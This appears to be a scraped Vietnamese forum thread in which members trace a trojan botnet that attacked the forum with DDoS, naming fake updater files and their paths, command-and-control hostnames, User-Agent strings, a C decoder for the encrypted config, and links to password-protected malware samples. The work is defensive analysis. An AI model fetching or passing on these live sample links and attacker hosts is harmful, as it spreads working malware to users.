Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244042 /hvaonline/posts/list/39641.html#244042 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244043 /hvaonline/posts/list/39641.html#244043 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. Nếu người dùng chỉ là "standard user" chớ chẳng phải là user với chủ quyền "administrator" thì hai động tác trên không thể xảy ra được. Trên Windows 7 càng khó hơn vì càng không thể "silently" thực thi việc này. Bởi vậy, với tổng cộng gần 100 ngàn IP tấn công HVA mấy ngày vừa qua (số lượng máy con thật sự đằng sau các IP này có lẽ còn nhiều hơn rất nhiều) toàn là những máy con chạy với chủ quyền "Administrator". Đây là sự thật đáng sợ. Cho dùng Windows 7 có bảo mật như thế nào đi chăng nữa mà người dùng sử dụng máy với account có chủ quyền cao nhất thì coi như tính bảo mật của Windows 7 cũng bỏ đi.   Hix, ngày xưa em cũng từng cài rất nhiều máy windows. Toàn cho người dùng với quyền administrator, bởi không bị giới hạn trong cài đặt phần mềm... Nhưng lâu rồi thì mới biết, những mấy như thế rất dễ bị virus, "mèo què" gây hại, bởi hiểu một cách đơn giản: dễ với mình thì cũng dễ với mã độc. Bởi vậy, nếu có cách anh chị nào hay cài đặt PC cho bạn bè, người thân, máy tính của công ty mình. Lưu ý nên cài với user bình thường, tạo các policy để giới hạn quyền... Phòng bênh trước khi chữa bệnh!]]> /hvaonline/posts/list/39641.html#244044 /hvaonline/posts/list/39641.html#244044 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

lequi wrote:
Em vừa vọc vài thứ trong máy, có lòi ra mấy URL (via whireshark):
http://tongfeirou.dyndns-web.com/banner1.png?cpn=<COMPUTER USERNAME> (404) https://biouzhen.dyndns-server.com/banner1.png?cpn=<COMPUTER USERNAME> (403 nginx)  
với User-Agent đều là:
Gozilla_2/General (??) 
Đang tiếp tục vọc tiếp ... 
1- Bạn lequi, tôi đã có đủ thông tin về 2 website (dynamic domain system) này rồi. Nhưng đề nghị bạn cung cấp thêm các thông tin cần thiết sau đây: - Tên Service, process trong hệ thống kích hoạt các kết nối Internet (Internet connection) đến các URL nói trên? (Có phải Service Name là wuauservcom và process là wuauclt.exe hay không? Cũng có nghĩa là trong C\ProgramFiles\Common Files của máy bạn có xuất hiện một folder mới (bình thường không có) tên là "Windows Update Components", trong folder này có các file: wuauclt.exe, wuauserv.dll và UsrClass.ini hay không? Chú ý là nôi dung trong UsrClass.ini được XOR-encrypted, ghi đia chỉ của master website. Trong trường hơp của ban, chúng phải là http://tongfeirou.dyndns-web.com http://biouzhen.dyndns-server.com. Có đúng như vậy không? Các file wuauclt.exe, wuauserv.dll cũng còn phải nằm ở C\WINDOWS\system32\setup nữa. ) - Chúng là các process riêng biệt hay chỉ một process kích hoạt kết nối đến cả hai URL nói trên? - Có service, process nào kích hoạt kết nối liên tục đến hvaonline.net hay tienve.org không? (tức là service này đang DDoS đến HVA) 2- Ngoài Acrobatupdater.exe, các bạn cũng cần kiểm tra sự hiện diện của các service process sau: - AdobeUpdateManager.exe - jucheck.exe (process giả update Java) - OSA.exe Chúng nằm ở các directories sau: Program Files\Adobe\AdobeUpdateManager.exe Program Files\Java\jre6\bin\jucheck.exe Program Files\Microsoft Office\Office11\OSA.exe Chúng cũng là thành phần của Trojan-bot đấy 3- Có bạn nào có mẫu của Trojan-Bot đang tấn công HVA xin gửi cho tôi để tôi kiểm tra. Chắc chắn sẽ có nhiều thông tin hữu ích. Cả chiều hôm nay bật máy, hạ firewall, disable các antivirus, truy cập đến nhiều website cho là nguy hiểm, mà không kiếm đươc con nào cả Thank you in advance. ]]>
/hvaonline/posts/list/39641.html#244047 /hvaonline/posts/list/39641.html#244047 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244048 /hvaonline/posts/list/39641.html#244048 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

lequi wrote:
@PXMMRF: Em sẽ kiểm tra các thông tin anh cần, và có 1 vài lưu ý là các thông tin e để trên đều liên quan đến DNS của Google, vì các thông tin trên tổng hợp trong quá trình bắt các packet gửi qua IP 8.8.8.8 (ngày mai em sẽ dump và gửi cho a vài chi tiết). Hôm nay em cũng có dạo qua các site, và down bộ unikey từ link: http://nethoabinh.com/showthread.php?t=315 Quét file này trên virustotal: http://www.virustotal.com/file-scan/report.html?id=02b3b347ff00c8bdcad7e4c557a41f36e4af110658aea57557fab2c0bd641b1e-1311508169 
OK! Cám ơn ban lequi. File UnikeySetup này có virus-trojan đấy, dù rằng một số Antivirus nổi tiếng như McAfee Antivirus Enterprise (newest version- up to date) không phát hiện ra Tôi sẽ ngâm cứu nó. Ngoài ra xin ban gửi Cache file của whireshark liên quan, cached từ máy của bạn vừa qua Again thank you! ]]>
/hvaonline/posts/list/39641.html#244050 /hvaonline/posts/list/39641.html#244050 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale wrote:
Vấn đề được đặt ra, tại sao người dùng dễ dàng tải exe từ những nguồn nào đó không phải từ trang chính thức của Adobe? 
Nếu STL thâm nhập trang web của Adobe và thay file trên đó bằng file của nó liệu có được không anh? Đó là một giả thiết thôi :P, coi bộ không khả thi (nhưng với trang web của Unikey thì chắc là có thể anh nhỉ, trang đó lâu lắm rồi không update. Em nhắc tới Unikey vì thấy trong các topic của anh TQN).]]>
/hvaonline/posts/list/39641.html#244051 /hvaonline/posts/list/39641.html#244051 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244054 /hvaonline/posts/list/39641.html#244054 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

Sau khi mình xoá Acrobatupdate.exe và xoá hết registry và dùng chương trình Avira thì Avira phát hiện ra trojan trong hình dưới và Acrobatupdate không chạy nữa. Nếu mình tắt chương trình Avira đi thì nó lại chạy trở lại.

Mình có thể cung cấp những gì cho diễn đàn để diệt con virut này. ]]>
/hvaonline/posts/list/39641.html#244065 /hvaonline/posts/list/39641.html#244065 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF wrote:
2- Ngoài Acrobatupdater.exe, các bạn cũng cần kiểm tra sự hiện diện của các service process sau: - AdobeUpdateManager.exe - jucheck.exe (process giả update Java) - OSA.exe Chúng nằm ở các directories sau: Program Files\Adobe\AdobeUpdateManager.exe Program Files\Java\jre6\bin\jucheck.exe Program Files\Microsoft Office\Office11\OSA.exe Chúng cũng là thành phần của Trojan-bot đấy 3- Có bạn nào có mẫu của Trojan-Bot đang tấn công HVA xin gửi cho tôi để tôi kiểm tra. Chắc chắn sẽ có nhiều thông tin hữu ích. Cả chiều hôm nay bật máy, hạ firewall, disable các antivirus, truy cập đến nhiều website cho là nguy hiểm, mà không kiếm đươc con nào cả Thank you in advance.  
E kiểm tra máy e thấy có file jucheck.exe tại thư mục như trên. Gửi anh PXMMRF mẫu file jucheck.exe Code:
http://www.mediafire.com/?wpbh40voy00k87w
]]>
/hvaonline/posts/list/39641.html#244067 /hvaonline/posts/list/39641.html#244067 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

asaxin wrote:
Chào mọi người, theo phân tích của anh conmale thì mình biết chắc chắn máy mình đã bị dính virus của STL.

Sau khi mình xoá Acrobatupdate.exe và xoá hết registry và dùng chương trình Avira thì Avira phát hiện ra trojan trong hình dưới và Acrobatupdate không chạy nữa. Nếu mình tắt chương trình Avira đi thì nó lại chạy trở lại.

Mình có thể cung cấp những gì cho diễn đàn để diệt con virut này.  
Khởi động lại Windows ở chế độ safe mode hoặc boot vào bằng Hiren cd rồi xoá hết nội dung trong c:\windows\tmp và c:\windows\temp]]>
/hvaonline/posts/list/39641.html#244068 /hvaonline/posts/list/39641.html#244068 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244070 /hvaonline/posts/list/39641.html#244070 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244071 /hvaonline/posts/list/39641.html#244071 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.
Xin cảm ơn.]]>
/hvaonline/posts/list/39641.html#244072 /hvaonline/posts/list/39641.html#244072 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
Chết là chết trong thời gian ngắn đó đấy anh PXM. Tụi nó sẽ cập nhật bot mới lập tức, setup URL download mới lập tức, hy sinh AcrobatUpdater và các URL cũ. Mình sẽ vẫn bị đánh tiếp. File config mới xc.jpg đã không ra lệnh tắt DDOS vào HVA, mà chỉ thay = dòng trêu chọc đó. Một lượng Bot lớn còn lại vẫn theo config cũ mà dập vào HVA ta. Đúng là nhức đầu. Giờ ta có dập được cái host direct.aliasx.net thì vẫn bị DDOS, chỉ còn nước tận diệt các bot còn tồn tại và nhanh chóng tìm ra bot mới. Nếu ISP can thiệp, tui nghĩ họ nên firewall 2 host penop.net và direct.aliasx.net. Bà con nào phát hiện AcrobatUpdater.exe mình và biết cách dùng Wireshark, CommView, TCPView hay SmartSniff (của Nirosoft) có thể giúp mọi người bằng cách: đừng xoá AcrobatUpdater.exe theo dõi thử AcrobatUpdater.exe connect tới host nào, URL ra sao, UserAgent như thế nào ?  
Từ hôm qua đến giờ, mỗi lần em bật máy lên là liên tục mỗi phút, máy em tự động check và download (nếu có thể) các file từ các địa chỉ mà anh đã gửi ở trên cùng 2 địa chỉ khác ở các host của STL mà em có. Anh chị em nếu phát hiện các địa chỉ file khác mà virus của đám STL tải về có thể gửi cho em qua tin nhắn riêng để em cùng theo dõi phụ. Ngặt nỗi, em không có máy online 24/24 để theo dõi liên tục mọi lúc đám virus STL này.]]>
/hvaonline/posts/list/39641.html#244073 /hvaonline/posts/list/39641.html#244073 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244075 /hvaonline/posts/list/39641.html#244075 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244076 /hvaonline/posts/list/39641.html#244076 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
Khoan khoan asaxin ! Cảm ơn cậu, đã chụp được rồi. Cậu up luôn mấy cái file .msi trong thư mục Temp đó luôn. Vấn đề quan trọng nhất bây giờ là xem thằng nào sinh ra mấy cái file .msi đó (.exe giả đuôi .msi: Microsoft Installer). Tạm tắt Avira đi, run FileMon hay ProcMon của SysInternal lên, xem thằng process nào sinh ra mấy cái giả danh đó. Up thằng exe đó lên, và up luôn hình các dll mà thằng process đó dùng luôn. Thằng đó là thằng nằm vùng đấy, chính nó down AcrobatUpdater.exe về để bot ! Gấp, khẩn cấp, làm ngay, anh em đang chờ thộp cổ thằng nằm vùng giấu mặt này ! Wireshark không hiển thì process connect được, cậu asaxin down ngay TCPView (SysInternals) hay CurrPorts, SmartSniff của NirSoft: http://www.nirsoft.net về. 
Hì hì, anh bậy thiệt. Sáng giờ lung tung công việc nên anh trả lời asaxin theo quán tính mà quên bà nó chuyện kêu asaxin lưu lại mấy miếng rác đó. Hy vọng asaxin chưa xoá nó :( .]]>
/hvaonline/posts/list/39641.html#244077 /hvaonline/posts/list/39641.html#244077 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244079 /hvaonline/posts/list/39641.html#244079 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244080 /hvaonline/posts/list/39641.html#244080 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

thegunner2401 wrote:
Sao hiện tại E vào internet (bằng cả Chrome và FireFox), nhất là vào HVAonline Check CurPorts đều thấy kết nối đến thutin.tienve.org:80 mà thằng Process là Trình duyệt? E nên làm thế nào bây h? (Newbie nên ko biết gì, các A thông cảm).:( 
thutin.tienve.org và www.hvaonline.net chạy trên cùng 1 IP cho nên đây là chuyện bình thường, chẳng có gì phải ngại hết.]]>
/hvaonline/posts/list/39641.html#244081 /hvaonline/posts/list/39641.html#244081 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

nobitapm wrote:

PXMMRF wrote:
2- Ngoài Acrobatupdater.exe, các bạn cũng cần kiểm tra sự hiện diện của các service process sau: - AdobeUpdateManager.exe - jucheck.exe (process giả update Java) - OSA.exe Chúng nằm ở các directories sau: Program Files\Adobe\AdobeUpdateManager.exe Program Files\Java\jre6\bin\jucheck.exe Program Files\Microsoft Office\Office11\OSA.exe Chúng cũng là thành phần của Trojan-bot đấy 3- Có bạn nào có mẫu của Trojan-Bot đang tấn công HVA xin gửi cho tôi để tôi kiểm tra. Chắc chắn sẽ có nhiều thông tin hữu ích. Cả chiều hôm nay bật máy, hạ firewall, disable các antivirus, truy cập đến nhiều website cho là nguy hiểm, mà không kiếm đươc con nào cả Thank you in advance.  
E kiểm tra máy e thấy có file jucheck.exe tại thư mục như trên. Gửi anh PXMMRF mẫu file jucheck.exe Code:
http://www.mediafire.com/?wpbh40voy00k87w
 
Mẫu này không phải virus, bạn yên tâm nhé]]>
/hvaonline/posts/list/39641.html#244082 /hvaonline/posts/list/39641.html#244082 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244083 /hvaonline/posts/list/39641.html#244083 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244085 /hvaonline/posts/list/39641.html#244085 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244086 /hvaonline/posts/list/39641.html#244086 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244088 /hvaonline/posts/list/39641.html#244088 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

lequi wrote:
@PXMMRF: Em sẽ kiểm tra các thông tin anh cần, và có 1 vài lưu ý là các thông tin e để trên đều liên quan đến DNS của Google, vì các thông tin trên tổng hợp trong quá trình bắt các packet gửi qua IP 8.8.8.8 (ngày mai em sẽ dump và gửi cho a vài chi tiết). Hôm nay em cũng có dạo qua các site, và down bộ unikey từ link: http://nethoabinh.com/showthread.php?t=315 Quét file này trên virustotal: http://www.virustotal.com/file-scan/report.html?id=02b3b347ff00c8bdcad7e4c557a41f36e4af110658aea57557fab2c0bd641b1e-1311508169 
Mình vừa check bộ Unikey setup này , cho đến giờ phút post bài này, file đó là file sạch. Bạn yên tâm nhé]]>
/hvaonline/posts/list/39641.html#244089 /hvaonline/posts/list/39641.html#244089 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
Ặc ặc, acoustics90 lại xúi bậy rồi. Chờ asaxin up lên thằng nào down AcrobeUpdater.exe về chứ. Phải có thằng down về thì mới có AcrobatUpdater.exe. Vấn đề anh đang suy nghĩ và tìm kiếm chính là thằng giấu mặt này nè ! 
Uh. em quên béng mất. Không hiểu thằng nào là thằng đầu tiên tải cái này nhỉ, theo em biết thì Jucheck tải về, nhưng có thể nó đi theo đường khác lắm. ]]>
/hvaonline/posts/list/39641.html#244090 /hvaonline/posts/list/39641.html#244090 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

acoustics89 wrote:

nobitapm wrote:
E kiểm tra máy e thấy có file jucheck.exe tại thư mục như trên. Gửi anh PXMMRF mẫu file jucheck.exe Code:
http://www.mediafire.com/?wpbh40voy00k87w
 
Mẫu này không phải virus, bạn yên tâm nhé 
Thanks bạn acoustic89. -:|-

TQN wrote:
2 Nobitapm: file jucheck.exe đó của em là file sạch, chính hãng Sun, bảo hành đàng hoàng. Máy em install Win7 64bit à ? 
Cảm ơn anh TQN. Win7 64bit đúng rồi đó anh :D. Do e không rành về IT nên không biết kiểm tra file sạch hay virus. :(]]>
/hvaonline/posts/list/39641.html#244092 /hvaonline/posts/list/39641.html#244092 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244093 /hvaonline/posts/list/39641.html#244093 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

asaxin wrote:
Tiếc quá, mình xoá hết rồi, mới ăn cơm xong. Hồi sáng có chạy chương trình cports và smsniff nhưng không chụp hình của nó. :( 
Bạn cứ gửi boot log với Process Monitor đi :) . Hướng dẫn scan và gửi boot log với Process Monitor http://support.cmclab.net/vn/tut0rial/h4327899ng-d7851n-scan-v224-g7917i-boot-log-v7899i-process-monitor/ Gửi log Autoruns nữa: Hướng dẫn scan và gửi log Autoruns http://support.cmclab.net/vn/tut0rial/huong-dan-scan-va-gui-log-autoruns/ ]]>
/hvaonline/posts/list/39641.html#244094 /hvaonline/posts/list/39641.html#244094 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244096 /hvaonline/posts/list/39641.html#244096 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244097 /hvaonline/posts/list/39641.html#244097 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.
CMC InfoSec sẽ cập nhật mầm virus này sớm nhất có thể. Anh chị em kiểm tra nếu trong máy tính nào có file ở đường dẫn trên, vui lòng gửi cho mình và anh TQN gấp, xin cảm ơn. ]]>
/hvaonline/posts/list/39641.html#244098 /hvaonline/posts/list/39641.html#244098 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244100 /hvaonline/posts/list/39641.html#244100 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244102 /hvaonline/posts/list/39641.html#244102 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244103 /hvaonline/posts/list/39641.html#244103 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244104 /hvaonline/posts/list/39641.html#244104 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

acoustics89 wrote:
Hóng mẫu, có mẫu mới thì em post tiếp, nếu không thì em đi ngủ :) A ha, lại là MsHelpCenter.exe =)) =)) Nếu thế bạn lấy luôn các file sau cùng 1 lượt cho tiện, đỡ up nhiều MsHelpCenter.idx thumbcache.db _desktop.ini cùng thư mục cả đấy, tổng cộng tầm 10MB, code thì ít mà toàn sh!t bên trong 
Còn thiếu! asaxin gửi thêm các file sau cho mình nhé: C:\MsHelpCenter.pdb c:\windows\microsoft help\thumbcache.db c:\windows\microsoft help\_desktop.ini c:\windows\microsoft help\MsHelpCenter.idx

TQN wrote:
Đã nhận được file của asaxin. Đúng rồi,còn thiếu thumbcache.db và _desktop.ini nữa, asaxin bật chế độ view hidden file lên, tìm và up giùm 2 file đó. Đích thị nằm vùng của STL rồi, không biết là mới hay cũ so với mẫu của acxxx89 ? Chia sẽ với bà con luôn: http://www.mediafire.com/?0jomzjk727n7181. Password: malware 
Em thấy còn thiếu MsHelpCenter.pdb .]]>
/hvaonline/posts/list/39641.html#244105 /hvaonline/posts/list/39641.html#244105 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244106 /hvaonline/posts/list/39641.html#244106 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

asaxin wrote:
Trong thư mục c:\windows\microsoft help của mình chỉ có 2 file là .exe và idx đã gửi thôi, không còn file nào khác. 
Bạn chịu khó dùng GMER hay Winrar, tìm đến thư mục c:\windows\microsoft help\ rồi copy file. Hiện cần 2 file sau để decrypt: c:\windows\microsoft help\thumbcache.db c:\windows\microsoft help\_desktop.ini ]]>
/hvaonline/posts/list/39641.html#244107 /hvaonline/posts/list/39641.html#244107 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244108 /hvaonline/posts/list/39641.html#244108 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244109 /hvaonline/posts/list/39641.html#244109 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244111 /hvaonline/posts/list/39641.html#244111 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
Hì hì, đủ file rồi đó acoustics89. Em RCE tiếp và tìm ra thằng website nào ra lệnh down AcrobeUpdater.exe về nhé. Giờ anh phải đi lang thang nữa rồi. 2 asaxin: Good job, tiếp tục chịu khó up các file mà tui đã list ở trên để kiểm tra luôn nhé ! Thank you very nhiều ! 
Đây là mẫu mà em tìm được trong máy: http://www.mediafire.com/?agsg6yco2amvle0 password: malware]]>
/hvaonline/posts/list/39641.html#244112 /hvaonline/posts/list/39641.html#244112 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. http://poxxf.com/flash.swf , tải file này về với User Agent là Gozilla_2/Default. cái link để download là http://poxxf.com/flash.swf?cpn=<User name> Lại vào đọc code tiếp , thấy nó giải mã file này bằng 1 thuật toán decode khác, em cũng chả hiểu lắm, nó làm gì thì mình làm thế Code:
#include <stdio.h>
#include <conio.h>
#include <windows.h>

int main(int argc, char *argv[])
{
	FILE *f; int i;
	long lSize;
	char *pBuffer, *p;
	char v24,v23; 
	int v7 = 0;
	
	
	char szOutPut[MAX_PATH] = "";

	if ((argc <2) || (argc >3 ))
	{
		printf("Usage: Decode <Encrypted> <Result>");
		exit(1);

	}
	if (argc == 2)
	{
		strcpy(szOutPut, "Decoded.txt");
	}
	else strncpy(szOutPut, argv[2],MAX_PATH);

	f = fopen(argv[1], "rb"); //doc file da ma hoa

	if (f)
	{
		fseek(f, 0, SEEK_END);
		lSize = ftell(f);
		fseek(f, 0, SEEK_SET);

		pBuffer =(char*) malloc(lSize+1024);
		if(pBuffer)
		{
			
			p = (char *)pBuffer+ 4;
			memset(pBuffer, 0, lSize+1024);
			fread((char*)pBuffer, lSize, 1, f);

			for ( i = 8; i < lSize; ++i )
			{
				v24 = p[v7 % 4];
				v23 = pBuffer[i];
				v23 = (v24 ^ v23) % 256;
				pBuffer[i] = v23;
				v7++;
				//v8 += v23 * v7++ % 7;
			}
		}
		fclose(f);


		if (pBuffer)
		{
			f = fopen(szOutPut, "wb");
			if (f)
			{
				fwrite((char*)pBuffer, lSize, 1, f); // ghi lai noi dung da giai ma
				fclose(f);
			}
			else printf("Can not open output file.");
			delete[] pBuffer ;
		}
	}
	else printf("Can not open input file.");
	return 0;
}
giải mã xong thì được xâu : http://poxxf.com/images.gif, lại tải về với User Agent là Gozilla_2/Default thấy nhiều kí tự 0x19 ở đầu file quá nhỉ, dung lượng lại lớn ( 282624 bytes) , cho vào Hex workshop XOR phát, may thì được luôn mà không thì đọc code tiếp :P Xor xong thì nó ra cái AdobeUpdate giả. Có lẽ đến đây, anh em đã biết thủ phạm tải cái adobe giả về ]]>
/hvaonline/posts/list/39641.html#244115 /hvaonline/posts/list/39641.html#244115 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. MsHelpCenter.exe. Bà con tuyên truyền mọi người quen biết, cộng đồng mạng nên nhanh tay xoá MsHelpCenter.* và cái thumbcache.db, _desktop.ini. Cảm ơn acoustics89, asaxin, bolzano (theo thứ tự ABC nhé, không phân bì nhé) rất nhiều. Nhờ các bạn, một đám "mèo què" của stl nằm vùng đã bị bà con vạch mặt. Và cũng nhờ mọi người, bà con cùng nhau tiếp tục úp các mẫu này cho các AV để các AV cập nhật và thịt cổ đám "mèo què" này: MS, KIS/KAV, Avira, AVG, Symantec, Trend... Thịt xong đám mshelpcenter này và AcrobatUpdater.exe này, chắc chắn STL sẽ không còn nhiều "hàng" để chơi trò bẩn thỉu DDOS nữa. Các bà con khác tiếp tục dùng Wireshark, CurPorts, SmartSniffs để tìm và up mẫu lên cho mọi người. Cũng có thể còn một (hay vài thằng nằm vùng nào đó nữa :-( )]]> /hvaonline/posts/list/39641.html#244116 /hvaonline/posts/list/39641.html#244116 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

acoustics89 wrote:

nobitapm wrote:

PXMMRF wrote:
2- Ngoài Acrobatupdater.exe, các bạn cũng cần kiểm tra sự hiện diện của các service process sau: - AdobeUpdateManager.exe - jucheck.exe (process giả update Java) - OSA.exe Chúng nằm ở các directories sau: Program Files\Adobe\AdobeUpdateManager.exe Program Files\Java\jre6\bin\jucheck.exe Program Files\Microsoft Office\Office11\OSA.exe Chúng cũng là thành phần của Trojan-bot đấy 3- Có bạn nào có mẫu của Trojan-Bot đang tấn công HVA xin gửi cho tôi để tôi kiểm tra. Chắc chắn sẽ có nhiều thông tin hữu ích. Cả chiều hôm nay bật máy, hạ firewall, disable các antivirus, truy cập đến nhiều website cho là nguy hiểm, mà không kiếm đươc con nào cả Thank you in advance.  
E kiểm tra máy e thấy có file jucheck.exe tại thư mục như trên. Gửi anh PXMMRF mẫu file jucheck.exe Code:
http://www.mediafire.com/?wpbh40voy00k87w
 
Mẫu này không phải virus, bạn yên tâm nhé 
Hì hì. Nó là thành phần của virus W32/VulcaBot của STL đấy. Tham khảo kỹ lai McAfee blog tại: http://blogs.mcafee.com/corporate/cto/vietnamese-speakers-targeted-in-cyberattack Đây là trường hợp "a Trojan horse masquerading as jucheck.exe" (Trojan hay virus đeo mặt nạ giả danh jucheck.exe). Vì jucheck.exe nguyên mẫu trong java là file chính thức của application này dùng để kiểm tra và nhắc nhở user update cho Java. Tác giả các virus thường dùng tên của một service hay tên file chính thức của OS, application để làm người dùng bối rối và tránh bị detect trong một số trường hợp. Trong trường hợp này ta phải kiểm tra kỹ với cách sau: 1- Kiểm tra xem file có digitally signed bởi Sun Microsystems, Inc không? Đây là yêu cầu quan trong và chính xác nhất 2 -Kiểm tra vị trí của file trong các directory xem có đúng không? jucheck.exe chính thức, nguyên bản phải nằm ở directory sau: C:\Program Files\Java\jre1.6.0_01\bin\jucheck.exe. Trong đó phần jre1.6.0_01 là tuỳ theo version của Java. Nếu jucheck.exe. nằm ở location dưới đây như McAfee đã viết ở blog trên: C:\Program Files\Java\jre6\bin\jucheck.exe thì jucheck.exe có thể vẫn là virus nếu máy bạn không đang cài Version mới nhất của Java. Trong trường hợp cài version mới nhất của Java thì Jucheck.exe có dung lượng là 422 KB (trên nên Win7) Nhưng nếu jucheck.exe lại nằm hay còn nằm ở các location sau: C:\Windows\System32\ C:\Program Files\Common Files\ hay C:\Users\AppData\Local\Temp\ và đặc biệt là C:\Windows\jucheck.exe Thì rất nhiều khả năng jucheck.exe là virus của STL Tôi chưa kiểm tra file jucheck.exe mà bạn nobitapm upload lên mediafire là file thật hay giả (vì bận kiểm việc khác) Xin bạn kiểm tra lại kỹ hơn Thưc tế cũng không đơn giản như ta nghĩ, nhất là với STL. C' est la vie mà ]]>
/hvaonline/posts/list/39641.html#244119 /hvaonline/posts/list/39641.html#244119 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
Không biết nói lời nào nữa, quá trời good job luôn acoustics89 ! Em làm nhanh thiệt, anh thì cứ đi từng file, từng hàm của nó. Nên chậm hơn em nhiều. Vậy là bà con đã biết thằng nằm vùng giấu mặt down AcrobatUpdater.exe về rồi nhé. Thủ phạm đây: MsHelpCenter.exe. Bà con tuyên truyền mọi người quen biết, cộng đồng mạng nên nhanh tay xoá MsHelpCenter.* và cái thumbcache.db, _desktop.ini. Cảm ơn acoustics89, asaxin, bolzano (theo thứ tự ABC nhé, không phân bì nhé) rất nhiều. Nhờ các bạn, một đám "mèo què" của stl nằm vùng đã bị bà con vạch mặt. Và cũng nhờ mọi người, bà con cùng nhau tiếp tục úp các mẫu này cho các AV để các AV cập nhật và thịt cổ đám "mèo què" này: MS, KIS/KAV, Avira, AVG, Symantec, Trend... Thịt xong đám mshelpcenter này và AcrobatUpdater.exe này, chắc chắn STL sẽ không còn nhiều "hàng" để chơi trò bẩn thỉu DDOS nữa. Các bà con khác tiếp tục dùng Wireshark, CurPorts, SmartSniffs để tìm và up mẫu lên cho mọi người. Cũng có thể còn một (hay vài thằng nằm vùng nào đó nữa :-( ) 
Hì hì, công nhận acoustics89 nhanh khiếp :). Anh nghĩ cái đống "mèo què" chưa hết đâu em. Theo anh thăm dò thì shells, hosts, domains.... còn nhiều lắm. Kỳ này phối hợp để "xin" vài cái địa chỉ thiệt thì hoạ may tình hình mới khác.]]>
/hvaonline/posts/list/39641.html#244121 /hvaonline/posts/list/39641.html#244121 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244123 /hvaonline/posts/list/39641.html#244123 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244124 /hvaonline/posts/list/39641.html#244124 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244125 /hvaonline/posts/list/39641.html#244125 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
Kệ nó em, acoustics89. Tới đây là được rồi, vì MsHelpCenter.exe đã cũ rồi, từ tháng 12 năm ngoái, lại được hardcoded string poxxf.com. Nó nằm nằm vùng lâu rồi. Giờ cắt được nó là coi như cắt 1 tay của tụi stl rồi. Chiều giờ ngồi nhà theo dõi topic này luôn. Ngoài trời đang mưa nữa, có lý do ngồi nhà hợp lý ;)  
Hì hì, trời này làm vài ve ở SG với anh em chắc có lý lắm đây. Sydney lạnh bỏ bu. Tối nay xuống còn có 3 độ. Còn cái msHelpCenter.exe thì anh nghĩ có thể nó đi ra từ những con trojan nhỏ hơn tự động "call home" và download những binaries lớn hơn.]]>
/hvaonline/posts/list/39641.html#244126 /hvaonline/posts/list/39641.html#244126 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244127 /hvaonline/posts/list/39641.html#244127 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. Code:
Set File Attributes: %SystemRoot%\Microsoft Help\thumbcache.db Flags: (FILE_ATTRIBUTE_NORMAL SECURITY_ANONYMOUS)
